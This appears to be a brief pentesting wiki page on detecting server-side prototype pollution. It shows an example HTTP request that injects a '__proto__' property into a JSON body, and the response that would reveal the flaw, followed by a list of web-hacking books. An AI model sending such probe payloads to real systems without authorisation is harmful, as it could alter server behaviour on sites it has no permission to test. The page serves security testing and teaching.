Prototype Pollution
Detection
POST /api/user HTTP/1.1
Host: vuln-api.com
...
{
"user":"bob",
"firstName":"Bob",
"lastName":"Smith",
"__proto__":{
"foo":"bar"
}
}
If the target is vulnerable to SSPP, then you may see a new property called foo with the value of bar reflected in the response:
HTTP/1.1 200 OK
...
{
"username":"bob",
"firstName":"Bob",
"lastName":"Smith",
"foo":"bar"
}
Tools
Resources
Interesting Books
Interesting BooksThe Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Last updated